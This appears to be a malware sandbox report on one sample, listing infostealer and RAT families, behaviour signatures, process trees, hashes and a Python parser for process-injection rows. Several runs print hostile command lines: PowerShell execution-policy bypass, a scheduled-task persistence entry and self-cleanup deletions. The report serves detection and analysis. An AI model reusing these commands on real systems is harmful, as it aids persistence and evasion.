Analysis Overview
| SHA256 | 031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18 |
Threat Level: Known bad
The file 031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Remcos family
Formbook family
Guloader family
Mirai
Bitrat family
Blustealer family
Agenttesla family
Remcos
AgentTesla
BluStealer
Xloader
Formbook
Servhelper family
BitRAT
Mirai family
Guloader,Cloudeye
ServHelper
Xloader family
Remote Service Session Hijacking: RDP Hijacking
Formbook payload
Grants admin privileges
AgentTesla payload
Xloader payload
Office macro that triggers on suspicious action
Blocklisted process makes network request
Indicator Removal: Network Share Connection Removal
Possible privilege escalation attempt
Suspicious Office macro
Server Software Component: Terminal Services DLL
Modifies RDP port number used by Windows
Credentials from Password Stores: Windows Credential Manager
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads WinSCP keys stored on the system
Unsecured Credentials: Credentials In Files
Modifies file permissions
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Indicator Removal: File Deletion
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Suspicious use of SetThreadContext
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Script User-Agent
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Modifies registry key
outlook_win_path
Checks processor information in registry
Suspicious behavior: RenamesItself
outlook_office_path
Runs net.exe
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Analysis: static1
Detonation Overview
| Reported | 2024-11-21 20:43 |
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 94s |
| Max time network | 158s |
Command Line
Signatures
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Browser Information Discovery
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe | "C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe" |
Network
Files
Analysis: behavioral29
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 93s |
| Max time network | 149s |
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
| Process | Command line |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1 |
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ydke0fwo.y5v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral3
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20241010-en |
| Max time kernel | 149s |
| Max time network | 20s |
Command Line
Signatures
Formbook
Formbook family
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2380 set thread context of 900 | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 900 set thread context of 1360 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2108 set thread context of 1360 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | "C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4386.tmp" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
| C:\Windows\SysWOW64\NAPSTAT.EXE | "C:\Windows\SysWOW64\NAPSTAT.EXE" |
| C:\Windows\SysWOW64\cmd.exe | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
Network
Files
C:\Users\Admin\AppData\Local\Temp\tmp4386.tmp
| MD5 | a50c2640b5274f5e598820547af97bdb |
| SHA1 | f7969aee761479dc295eb3f73c2e8860580380fc |
| SHA256 | 1b69eeb39d437222ee4506051bf9266c161dbddceeab94222e3c38993d793527 |
| SHA512 | e1df8a93c3878bac372ae9f99bbdd4091746b8c01359ab8866a4042119b0ced37105aa2b283542cd57559be6f941242263838827cf45f86ccff107e538fb8005 |
Analysis: behavioral27
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 149s |
| Max time network | 150s |
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3124 set thread context of 3836 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3836 set thread context of 3420 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 4996 set thread context of 3420 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | "C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "{path}" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "{path}" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "{path}" |
| C:\Windows\SysWOW64\explorer.exe | "C:\Windows\SysWOW64\explorer.exe" |
| C:\Windows\SysWOW64\cmd.exe | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
Network
Files
Analysis: behavioral28
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 141s |
| Max time network | 124s |
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
| Process | Command line |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1 |
Network
Files
Analysis: behavioral9
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20241010-en |
| Max time kernel | 66s |
| Max time network | 19s |
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2304 set thread context of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | "C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe" |
| C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | "C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe" |
Network
Files
Analysis: behavioral15
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240729-en |
| Max time kernel | 118s |
| Max time network | 124s |
Command Line
Signatures
BluStealer
Blustealer family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2072 set thread context of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | "C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe" |
| C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | "C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe" |
Network
Files
Analysis: behavioral26
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 149s |
| Max time network | 121s |
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3032 set thread context of 1192 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2828 set thread context of 1192 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | "C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "{path}" |
| C:\Windows\SysWOW64\rundll32.exe | "C:\Windows\SysWOW64\rundll32.exe" |
| C:\Windows\SysWOW64\cmd.exe | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
Network
Files
Analysis: behavioral30
Detonation Overview
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 146s |
| Max time network | 123s |
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2392 set thread context of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2572 set thread context of 1212 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2540 set thread context of 1212 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\NAPSTAT.EXE
"C:\Windows\SysWOW64\NAPSTAT.EXE"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
memory/2392-0-0x0000000073EAE000-0x0000000073EAF000-memory.dmp
memory/2392-1-0x0000000000980000-0x0000000000A86000-memory.dmp
memory/2392-2-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2392-3-0x0000000000210000-0x0000000000218000-memory.dmp
memory/2392-4-0x0000000073EAE000-0x0000000073EAF000-memory.dmp
memory/2392-5-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2392-6-0x0000000005010000-0x000000000509C000-memory.dmp
memory/2392-7-0x0000000000630000-0x000000000066A000-memory.dmp
memory/2572-8-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2572-13-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-9-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2392-14-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2572-15-0x00000000009E0000-0x0000000000CE3000-memory.dmp
memory/2572-17-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-18-0x0000000000090000-0x00000000000A0000-memory.dmp
memory/1212-19-0x0000000006800000-0x0000000006905000-memory.dmp
memory/2540-21-0x0000000000EC0000-0x0000000000F06000-memory.dmp
memory/2540-20-0x0000000000EC0000-0x0000000000F06000-memory.dmp
memory/2540-22-0x0000000000080000-0x00000000000A8000-memory.dmp
memory/1212-23-0x0000000006800000-0x0000000006905000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
13s
Max time network
19s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2328 set thread context of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
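The SetThreadContext rows in behavioral30 (USD $.exe into RegSvcs.exe, RegSvcs.exe into Explorer.EXE, NAPSTAT.EXE into Explorer.EXE, then cmd.exe deleting RegSvcs.exe) and in behavioral1 (Order.exe into a second Order.exe) are two shapes of the same technique: a thread context in another process is rewritten so execution lands in attacker-supplied memory. The Python below is an added example, not part of the report and not the sandbox's own signature logic. It parses the rows exactly as printed above, reconstructs each hop-by-hop chain from the PIDs, separates cross-image injection (a signed .NET utility or the shell used as host) from self-injection into a child copy of the dropper, and ties the `cmd /c del` command line back to an injected host. The sample rows are copied from this page; the verdict wording is the example's own.

```python
import ntpath
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Rows copied from the "Suspicious use of SetThreadContext" tables and the
# Processes lists above (behavioral30 and behavioral1). The data is the
# report's; the parser and the checks are the added part.
B30_ROWS = [
    r"| PID 2392 set thread context of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |",
    r"| PID 2572 set thread context of 1212 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |",
    r"| PID 2540 set thread context of 1212 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |",
]
B30_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\USD $.exe"',
    r'"{path}"',
    r'"C:\Windows\SysWOW64\NAPSTAT.EXE"',
    r'/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
]
B1_ROWS = [
    r"| PID 2328 set thread context of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |",
]

Edge = Tuple[int, int, str, str]  # (src_pid, dst_pid, src_image, dst_image)
ROW_RE = re.compile(r"PID (\d+) set thread context of (\d+)")
DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.I)


def parse_edges(rows: List[str]) -> List[Edge]:
    """Turn '| PID a set thread context of b | N/A | src | dst |' rows into edges."""
    edges: List[Edge] = []
    for row in rows:
        cells = [c.strip() for c in row.strip().strip("|").split("|")]
        m = ROW_RE.search(cells[0])
        if m and len(cells) >= 4:
            edges.append((int(m.group(1)), int(m.group(2)), cells[2], cells[3]))
    return edges


def injection_chains(edges: List[Edge]) -> List[List[str]]:
    """Follow edges from processes that were never themselves a target and
    return each chain as a list of image basenames (root first)."""
    by_src: Dict[int, List[Edge]] = defaultdict(list)
    for e in edges:
        by_src[e[0]].append(e)
    targets = {e[1] for e in edges}
    chains: List[List[str]] = []

    def walk(pid: int, path: List[str], seen: frozenset) -> None:
        if pid not in by_src or pid in seen:   # leaf, or a cycle in the data
            chains.append(path)
            return
        for _, dst, src_img, dst_img in by_src[pid]:
            step = (path or [ntpath.basename(src_img)]) + [ntpath.basename(dst_img)]
            walk(dst, step, seen | {pid})

    for pid in list(by_src):
        if pid not in targets:
            walk(pid, [], frozenset())
    return chains


def findings(edges: List[Edge], cmdlines: List[str]) -> List[str]:
    """Per-edge verdicts, plus a check for cmd.exe deleting an injected host."""
    out: List[str] = []
    for src, dst, src_img, dst_img in edges:
        s, d = ntpath.basename(src_img), ntpath.basename(dst_img)
        if s.lower() == d.lower():
            out.append(f"self-injection: {s} (PID {src}) hollowed a child copy (PID {dst})")
        else:
            out.append(f"cross-image injection: {s} (PID {src}) -> {d} (PID {dst})")
        if d.lower() == "explorer.exe":
            out.append(f"shell process targeted: {s} (PID {src}) wrote into explorer.exe (PID {dst})")
    hosts = {e[3].lower() for e in edges}
    for cl in cmdlines:
        m = DEL_RE.search(cl)
        if m and m.group(1).lower() in hosts:
            out.append(f"cleanup: cmd deleted injection host {ntpath.basename(m.group(1))}")
    return out


if __name__ == "__main__":
    for label, rows, cmds in (("behavioral30", B30_ROWS, B30_CMDLINES), ("behavioral1", B1_ROWS, [])):
        edges = parse_edges(rows)
        print(label, "chains:", [" -> ".join(c) for c in injection_chains(edges)])
        for line in findings(edges, cmds):
            print("  ", line)
```

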